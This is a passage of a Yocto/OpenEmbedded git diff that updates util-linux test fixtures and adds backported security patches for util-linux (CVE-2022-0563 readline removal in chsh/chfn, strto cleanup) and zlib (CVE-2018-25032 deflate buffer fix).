+ /var/lib/nfs/rpc_pipefs      sunrpc           rpc_pipefs            rw,relatime
+ /mnt/sounds                  //foo.home/bar/  cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo                     /fooooo          bar                   rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-default b/tests/expected/findmnt/outputs-default
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-default
++++ b/tests/expected/findmnt/outputs-default
+@@ -30,6 +30,5 @@ TARGET                         SOURCE                FSTYPE                OPTIO
+ |-/home/kzak                   /dev/mapper/kzak-home ext4                  rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs           gvfs-fuse-daemon      fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs      sunrpc                rpc_pipefs            rw,relatime
+-|-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo                     /fooooo               bar                   rw,relatime
++`-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-force-tree b/tests/expected/findmnt/outputs-force-tree
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-force-tree
++++ b/tests/expected/findmnt/outputs-force-tree
+@@ -30,6 +30,5 @@ TARGET                         SOURCE                FSTYPE                OPTIO
+ |-/home/kzak                   /dev/mapper/kzak-home ext4                  rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs           gvfs-fuse-daemon      fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs      sunrpc                rpc_pipefs            rw,relatime
+-|-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo                     /fooooo               bar                   rw,relatime
++`-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-kernel b/tests/expected/findmnt/outputs-kernel
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-kernel
++++ b/tests/expected/findmnt/outputs-kernel
+@@ -30,6 +30,5 @@ TARGET                         SOURCE                FSTYPE                OPTIO
+ |-/home/kzak                   /dev/mapper/kzak-home ext4                  rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs           gvfs-fuse-daemon      fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs      sunrpc                rpc_pipefs            rw,relatime
+-|-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo                     /fooooo               bar                   rw,relatime
++`-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/libmount/tabdiff-mount b/tests/expected/libmount/tabdiff-mount
+index 420aeacd5e..3c18f8dc4f 100644
+--- a/tests/expected/libmount/tabdiff-mount
++++ b/tests/expected/libmount/tabdiff-mount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: MOUNTED
+-/fooooo on /mnt/foo: MOUNTED
+ tmpfs on /mnt/test/foo
bar: MOUNTED
+diff --git a/tests/expected/libmount/tabdiff-move b/tests/expected/libmount/tabdiff-move
+index 24f9bc791b..95820d93ef 100644
+--- a/tests/expected/libmount/tabdiff-move
++++ b/tests/expected/libmount/tabdiff-move
+@@ -1,3 +1,2 @@
+ //foo.home/bar/ on /mnt/music: MOVED to /mnt/music
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo
bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-remount b/tests/expected/libmount/tabdiff-remount
+index 82ebeab390..876bfd9539 100644
+--- a/tests/expected/libmount/tabdiff-remount
++++ b/tests/expected/libmount/tabdiff-remount
+@@ -1,4 +1,3 @@
+ /dev/mapper/kzak-home on /home/kzak: REMOUNTED from 'rw,noatime,barrier=1,data=ordered' to 'ro,noatime,barrier=1,data=ordered'
+ //foo.home/bar/ on /mnt/sounds: REMOUNTED from 'rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344' to 'ro,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344'
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo
bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-umount b/tests/expected/libmount/tabdiff-umount
+index a3e0fe48a1..c7be725b92 100644
+--- a/tests/expected/libmount/tabdiff-umount
++++ b/tests/expected/libmount/tabdiff-umount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: UMOUNTED
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo
bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabfiles-parse-mountinfo b/tests/expected/libmount/tabfiles-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-parse-mountinfo
+@@ -351,17 +351,6 @@ id:     47
+ parent: 20
+ devno:  0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root:   /
+-id:     48
+-parent: 20
+-devno:  0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo
bar
+ fstype: tmpfs
+diff --git a/tests/expected/libmount/tabfiles-py-parse-mountinfo b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-py-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+@@ -351,17 +351,6 @@ id:     47
+ parent: 20
+ devno:  0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root:   /
+-id:     48
+-parent: 20
+-devno:  0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo
bar
+ fstype: tmpfs
+diff --git a/tests/ts/findmnt/files/mountinfo b/tests/ts/findmnt/files/mountinfo
+index 475ea1a337..ff1e664a84 100644
+--- a/tests/ts/findmnt/files/mountinfo
++++ b/tests/ts/findmnt/files/mountinfo
+@@ -30,4 +30,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/findmnt/files/mountinfo-nonroot b/tests/ts/findmnt/files/mountinfo-nonroot
+index e15b467016..87b421d2ef 100644
+--- a/tests/ts/findmnt/files/mountinfo-nonroot
++++ b/tests/ts/findmnt/files/mountinfo-nonroot
+@@ -29,4 +29,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/libmount/files/mountinfo b/tests/ts/libmount/files/mountinfo
+index c063071833..2b01740481 100644
+--- a/tests/ts/libmount/files/mountinfo
++++ b/tests/ts/libmount/files/mountinfo
+@@ -30,5 +30,4 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+ 49 20 0:56 / /mnt/test/foo
bar rw,relatime shared:323 - tmpfs tmpfs rw
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
new file mode 100644
index 0000000000..54b496ea3f
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
@@ -0,0 +1,161 @@
+From faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Thu, 10 Feb 2022 12:03:17 +0100
+Subject: [PATCH] chsh, chfn: remove readline support [CVE-2022-0563]
+
+The readline library uses INPUTRC= environment variable to get a path
+to the library config file. When the library cannot parse the
+specified file, it prints an error message containing data from the
+file.
+
+Unfortunately, the library does not use secure_getenv() (or a similar
+concept) to avoid vulnerabilities that could occur if set-user-ID or
+set-group-ID programs.
+
+Reported-by: Rory Mackie <rory.mackie@trailofbits.com>
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-status: Backport
+https://github.com/util-linux/util-linux/commit/faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17
+
+CVE: CVE-2022-0563
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ login-utils/Makemodule.am |  2 +-
+ login-utils/chfn.c        | 16 +++------------
+ login-utils/chsh.c        | 42 ++-------------------------------------
+ 3 files changed, 6 insertions(+), 54 deletions(-)
+
+diff --git a/login-utils/Makemodule.am b/login-utils/Makemodule.am
+index fac5bfc..73636af 100644
+--- a/login-utils/Makemodule.am
++++ b/login-utils/Makemodule.am
+@@ -82,7 +82,7 @@ chfn_chsh_sources = \
+ 	login-utils/ch-common.c
+ chfn_chsh_cflags = $(SUID_CFLAGS) $(AM_CFLAGS)
+ chfn_chsh_ldflags = $(SUID_LDFLAGS) $(AM_LDFLAGS)
+-chfn_chsh_ldadd = libcommon.la $(READLINE_LIBS)
++chfn_chsh_ldadd = libcommon.la
+ 
+ if CHFN_CHSH_PASSWORD
+ chfn_chsh_ldadd += -lpam
+diff --git a/login-utils/chfn.c b/login-utils/chfn.c
+index b739555..2f8e44a 100644
+--- a/login-utils/chfn.c
++++ b/login-utils/chfn.c
+@@ -56,11 +56,6 @@
+ # include "auth.h"
+ #endif
+ 
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct finfo {
+ 	char *full_name;
+ 	char *office;
+@@ -229,22 +224,17 @@ static char *ask_new_field(struct chfn_control *ctl, const char *question,
+ {
+ 	int len;
+ 	char *buf;
+-#ifndef HAVE_LIBREADLINE
+-	size_t dummy = 0;
+-#endif
+ 
+ 	if (!def_val)
+ 		def_val = "";
++
+ 	while (true) {
+ 		printf("%s [%s]: ", question, def_val);
+ 		__fpurge(stdin);
+-#ifdef HAVE_LIBREADLINE
+-		rl_bind_key('\t', rl_insert);
+-		if ((buf = readline(NULL)) == NULL)
+-#else
++
+ 		if (getline(&buf, &dummy, stdin) < 0)
+-#endif
+ 			errx(EXIT_FAILURE, _("Aborted."));
++
+ 		/* remove white spaces from string end */
+ 		ltrim_whitespace((unsigned char *) buf);
+ 		len = rtrim_whitespace((unsigned char *) buf);
+diff --git a/login-utils/chsh.c b/login-utils/chsh.c
+index a9ebec8..ee6ff87 100644
+--- a/login-utils/chsh.c
++++ b/login-utils/chsh.c
+@@ -58,11 +58,6 @@
+ # include "auth.h"
+ #endif
+ 
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct sinfo {
+ 	char *username;
+ 	char *shell;
+@@ -121,33 +116,6 @@ static void print_shells(void)
+ 	endusershell();
+ }
+ 
+-#ifdef HAVE_LIBREADLINE
+-static char *shell_name_generator(const char *text, int state)
+-{
+-	static size_t len;
+-	char *s;
+-
+-	if (!state) {
+-		setusershell();
+-		len = strlen(text);
+-	}
+-
+-	while ((s = getusershell())) {
+-		if (strncmp(s, text, len) == 0)
+-			return xstrdup(s);
+-	}
+-	return NULL;
+-}
+-
+-static char **shell_name_completion(const char *text,
+-				    int start __attribute__((__unused__)),
+-				    int end __attribute__((__unused__)))
+-{
+-	rl_attempted_completion_over = 1;
+-	return rl_completion_matches(text, shell_name_generator);
+-}
+-#endif
+-
+ /*
+  *  parse_argv () --
+  *	parse the command line arguments, and fill in "pinfo" with any
+@@ -198,20 +166,14 @@ static char *ask_new_shell(char *question, char *oldshell)
+ {
+ 	int len;
+ 	char *ans = NULL;
+-#ifdef HAVE_LIBREADLINE
+-	rl_attempted_completion_function = shell_name_completion;
+-#else
+ 	size_t dummy = 0;
+-#endif
++
+ 	if (!oldshell)
+ 		oldshell = "";
+ 	printf("%s [%s]\n", question, oldshell);
+-#ifdef HAVE_LIBREADLINE
+-	if ((ans = readline("> ")) == NULL)
+-#else
+ 	if (getline(&ans, &dummy, stdin) < 0)
+-#endif
+ 		return NULL;
++
+ 	/* remove the newline at the end of ans. */
+ 	ltrim_whitespace((unsigned char *) ans);
+ 	len = rtrim_whitespace((unsigned char *) ans);
+-- 
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
new file mode 100644
index 0000000000..5d5a370821
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
@@ -0,0 +1,270 @@
+From 84825b161ba5d18da4142893b9789b3fc71284d9 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 22 Jun 2021 14:20:42 +0200
+Subject: [PATCH] include/strutils: cleanup strto..() functions
+
+* add ul_strtos64() and ul_strtou64()
+* add simple test
+
+Addresses: https://github.com/karelzak/util-linux/issues/1358
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-Backport: [https://github.com/util-linux/util-linux/commit/84825b161ba5d18da4142893b9789b3fc71284d9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h |   3 +
+ lib/strutils.c     | 174 ++++++++++++++++++++++++++-------------------
+ 2 files changed, 105 insertions(+), 72 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index e75a2f0e17..389e849905 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -19,6 +19,9 @@ extern int parse_size(const char *str, uintmax_t *res, int *power);
+ extern int strtosize(const char *str, uintmax_t *res);
+ extern uintmax_t strtosize_or_err(const char *str, const char *errmesg);
+ 
++extern int ul_strtos64(const char *str, int64_t *num, int base);
++extern int ul_strtou64(const char *str, uint64_t *num, int base);
++
+ extern int16_t strtos16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtou16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtox16_or_err(const char *str, const char *errmesg);
+diff --git a/lib/strutils.c b/lib/strutils.c
+index ee2c835495..d9976dca70 100644
+--- a/lib/strutils.c
++++ b/lib/strutils.c
+@@ -319,39 +319,80 @@ char *strndup(const char *s, size_t n)
+ }
+ #endif
+ 
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base);
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base);
++/*
++ * convert strings to numbers; returns <0 on error, and 0 on success
++ */
++int ul_strtos64(const char *str, int64_t *num, int base)
++{
++	char *end = NULL;
+ 
+-int16_t strtos16_or_err(const char *str, const char *errmesg)
++	errno = 0;
++	if (str == NULL || *str == '\0')
++		return -EINVAL;
++	*num = (int64_t) strtoimax(str, &end, base);
++
++	if (errno || str == end || (end && *end))
++		return -EINVAL;
++	return 0;
++}
++
++int ul_strtou64(const char *str, uint64_t *num, int base)
+ {
+-	int32_t num = strtos32_or_err(str, errmesg);
++	char *end = NULL;
+ 
+-	if (num < INT16_MIN || num > INT16_MAX) {
+-		errno = ERANGE;
+-		err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-	}
+-	return num;
++	errno = 0;
++	if (str == NULL || *str == '\0')
++		return -EINVAL;
++	*num = (uint64_t) strtoumax(str, &end, base);
++
++	if (errno || str == end || (end && *end))
++		return -EINVAL;
++	return 0;
+ }
+ 
+-static uint16_t _strtou16_or_err(const char *str, const char *errmesg, int base)
++/*
++ * Covert strings to numbers and print message on error.
++ *
++ * Note that hex functions (strtox..()) returns unsigned numbers, if you need
++ * something else then use ul_strtos64(s, &n, 16).
++ */
++int64_t strtos64_or_err(const char *str, const char *errmesg)
+ {
+-	uint32_t num = _strtou32_or_err(str, errmesg, base);
++	int64_t num = 0;
+ 
+-	if (num > UINT16_MAX) {
+-		errno = ERANGE;
+-		err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	if (ul_strtos64(str, &num, 10) != 0) {
++		if (errno == ERANGE)
++			err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++		errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+ 	}
+ 	return num;
+ }
+ 
+-uint16_t strtou16_or_err(const char *str, const char *errmesg)
++uint64_t strtou64_or_err(const char *str, const char *errmesg)
+ {
+-	return _strtou16_or_err(str, errmesg, 10);
++	uint64_t num = 0;
++
++	if (ul_strtou64(str, &num, 10)) {
++		if (errno == ERANGE)
++			err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++		errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	}
++	return num;
+ }
+ 
+-uint16_t strtox16_or_err(const char *str, const char *errmesg)
++uint64_t strtox64_or_err(const char *str, const char *errmesg)
+ {
+-	return _strtou16_or_err(str, errmesg, 16);
++	uint64_t num = 0;
++
++	if (ul_strtou64(str, &num, 16)) {
++		if (errno == ERANGE)
++			err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++		errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	}
++	return num;
+ }
+ 
+ int32_t strtos32_or_err(const char *str, const char *errmesg)
+@@ -365,9 +406,9 @@ int32_t strtos32_or_err(const char *str, const char *errmesg)
+ 	return num;
+ }
+ 
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
++uint32_t strtou32_or_err(const char *str, const char *errmesg)
+ {
+-	uint64_t num = _strtou64_or_err(str, errmesg, base);
++	uint64_t num = strtou64_or_err(str, errmesg);
+ 
+ 	if (num > UINT32_MAX) {
+ 		errno = ERANGE;
+@@ -376,66 +417,48 @@ static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
+ 	return num;
+ }
+ 
+-uint32_t strtou32_or_err(const char *str, const char *errmesg)
+-{
+-	return _strtou32_or_err(str, errmesg, 10);
+-}
+-
+ uint32_t strtox32_or_err(const char *str, const char *errmesg)
+ {
+-	return _strtou32_or_err(str, errmesg, 16);
++	uint64_t num = strtox64_or_err(str, errmesg);
++
++	if (num > UINT32_MAX) {
++		errno = ERANGE;
++		err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	}
++	return num;
+ }
+ 
+-int64_t strtos64_or_err(const char *str, const char *errmesg)
++int16_t strtos16_or_err(const char *str, const char *errmesg)
+ {
+-	int64_t num;
+-	char *end = NULL;
+-
+-	errno = 0;
+-	if (str == NULL || *str == '\0')
+-		goto err;
+-	num = strtoimax(str, &end, 10);
+-
+-	if (errno || str == end || (end && *end))
+-		goto err;
++	int64_t num = strtos64_or_err(str, errmesg);
+ 
+-	return num;
+-err:
+-	if (errno == ERANGE)
++	if (num < INT16_MIN || num > INT16_MAX) {
++		errno = ERANGE;
+ 		err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+-	errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	}
++	return num;
+ }
+ 
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base)
++uint16_t strtou16_or_err(const char *str, const char *errmesg)
+ {
+-	uintmax_t num;
+-	char *end = NULL;
+-
+-	errno = 0;
+-	if (str == NULL || *str == '\0')
+-		goto err;
+-	num = strtoumax(str, &end, base);
+-
+-	if (errno || str == end || (end && *end))
+-		goto err;
++	uint64_t num = strtou64_or_err(str, errmesg);
+ 
+-	return num;
+-err:
+-	if (errno == ERANGE)
++	if (num > UINT16_MAX) {
++		errno = ERANGE;
+ 		err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+-	errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	}
++	return num;
+ }
+ 
+-uint64_t strtou64_or_err(const char *str, const char *errmesg)
++uint16_t strtox16_or_err(const char *str, const char *errmesg)
+ {
+-	return _strtou64_or_err(str, errmesg, 10);
+-}
++	uint64_t num = strtox64_or_err(str, errmesg);
+ 
+-uint64_t strtox64_or_err(const char *str, const char *errmesg)
+-{
+-	return _strtou64_or_err(str, errmesg, 16);
++	if (num > UINT16_MAX) {
++		errno = ERANGE;
++		err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++	}
++	return num;
+ }
+ 
+ double strtod_or_err(const char *str, const char *errmesg)
+@@ -1051,15 +1051,25 @@ static int test_strutils_cmp_paths(int a
+ 
+ int main(int argc, char *argv[])
+ {
+-	if (argc == 3 && strcmp(argv[1], "--size") == 0)
++	if (argc == 3 && strcmp(argv[1], "--size") == 0) {
+ 		return test_strutils_sizes(argc - 1, argv + 1);
+ 
+-	else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0)
++	} else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0) {
+ 		return test_strutils_cmp_paths(argc - 1, argv + 1);
+ 
++	} else if (argc == 3 && strcmp(argv[1], "--str2num") == 0) {
++        	uint64_t n;
++
++        	if (ul_strtou64(argv[2], &n, 10) == 0) {
++                	printf("'%s' --> %ju\n", argv[2], (uintmax_t) n);
++                	return EXIT_SUCCESS;
++        	}
++	}
++
+ 	else {
+ 		fprintf(stderr, "usage: %1$s --size <number>[suffix]\n"
+-				"       %1$s --cmp-paths <path> <path>\n",
++				"       %1$s --cmp-paths <path> <path>\n"
++				"       %1$s --num2num <str>\n",
+ 				argv[0]);
+ 		exit(EXIT_FAILURE);
+ 	}
diff --git a/meta/recipes-core/util-linux/util-linux_2.35.1.bb b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
index 516b783887..89dc564ecb 100644
--- a/meta/recipes-core/util-linux/util-linux_2.35.1.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
@@ -11,6 +11,11 @@ SRC_URI += "file://configure-sbindir.patch \
             file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \
             file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \
             file://0001-include-cleanup-pidfd-inckudes.patch \
+            file://CVE-2021-37600.patch \
+            file://include-strutils-cleanup-strto-functions.patch \
+            file://CVE-2021-3995.patch \
+            file://CVE-2021-3996.patch \
+            file://CVE-2022-0563.patch \
 "
 SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf"
 SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9"
diff --git a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
index b23355a714..4b34ebd12d 100644
--- a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
+++ b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
@@ -1,6 +1,6 @@
 [Unit]
 Description=Bind mount volatile @where@
-DefaultDependencies=false
+DefaultDependencies=no
 Before=local-fs.target
 RequiresMountsFor=@whatparent@ @whereparent@
 ConditionPathIsReadWrite=@whatparent@
diff --git a/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
new file mode 100644
index 0000000000..5cb6183641
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
@@ -0,0 +1,347 @@
+CVE: CVE-2018-25032
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 5c44459c3b28a9bd3283aaceab7c615f8020c531 Mon Sep 17 00:00:00 2001
+From: Mark Adler <madler@alumni.caltech.edu>
+Date: Tue, 17 Apr 2018 22:09:22 -0700
+Subject: [PATCH] Fix a bug that can crash deflate on some input when using
+ Z_FIXED.
+
+This bug was reported by Danilo Ramos of Eideticom, Inc. It has
+lain in wait 13 years before being found! The bug was introduced
+in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
+option forces the use of fixed Huffman codes. For rare inputs with
+a large number of distant matches, the pending buffer into which
+the compressed data is written can overwrite the distance symbol
+table which it overlays. That results in corrupted output due to
+invalid distances, and can result in out-of-bound accesses,
+crashing the application.
+
+The fix here combines the distance buffer and literal/length
+buffers into a single symbol buffer. Now three bytes of pending
+buffer space are opened up for each literal or length/distance
+pair consumed, instead of the previous two bytes. This assures
+that the pending buffer cannot overwrite the symbol table, since
+the maximum fixed code compressed length/distance is 31 bits, and
+since there are four bytes of pending space for every three bytes
+of symbol space.
+---
+ deflate.c | 74 ++++++++++++++++++++++++++++++++++++++++---------------
+ deflate.h | 25 +++++++++----------
+ trees.c   | 50 +++++++++++--------------------------
+ 3 files changed, 79 insertions(+), 70 deletions(-)
+
+diff --git a/deflate.c b/deflate.c
+index 425babc00..19cba873a 100644
+--- a/deflate.c
++++ b/deflate.c
+@@ -255,11 +255,6 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+     int wrap = 1;
+     static const char my_version[] = ZLIB_VERSION;
+ 
+-    ushf *overlay;
+-    /* We overlay pending_buf and d_buf+l_buf. This works since the average
+-     * output size for (length,distance) codes is <= 24 bits.
+-     */
+-
+     if (version == Z_NULL || version[0] != my_version[0] ||
+         stream_size != sizeof(z_stream)) {
+         return Z_VERSION_ERROR;
+@@ -329,9 +324,47 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ 
+     s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
+ 
+-    overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
+-    s->pending_buf = (uchf *) overlay;
+-    s->pending_buf_size = (ulg)s->lit_bufsize * (sizeof(ush)+2L);
++    /* We overlay pending_buf and sym_buf. This works since the average size
++     * for length/distance pairs over any compressed block is assured to be 31
++     * bits or less.
++     *
++     * Analysis: The longest fixed codes are a length code of 8 bits plus 5
++     * extra bits, for lengths 131 to 257. The longest fixed distance codes are
++     * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest
++     * possible fixed-codes length/distance pair is then 31 bits total.
++     *
++     * sym_buf starts one-fourth of the way into pending_buf. So there are
++     * three bytes in sym_buf for every four bytes in pending_buf. Each symbol
++     * in sym_buf is three bytes -- two for the distance and one for the
++     * literal/length. As each symbol is consumed, the pointer to the next
++     * sym_buf value to read moves forward three bytes. From that symbol, up to
++     * 31 bits are written to pending_buf. The closest the written pending_buf
++     * bits gets to the next sym_buf symbol to read is just before the last
++     * code is written. At that time, 31*(n-2) bits have been written, just
++     * after 24*(n-2) bits have been consumed from sym_buf. sym_buf starts at
++     * 8*n bits into pending_buf. (Note that the symbol buffer fills when n-1
++     * symbols are written.) The closest the writing gets to what is unread is
++     * then n+14 bits. Here n is lit_bufsize, which is 16384 by default, and
++     * can range from 128 to 32768.
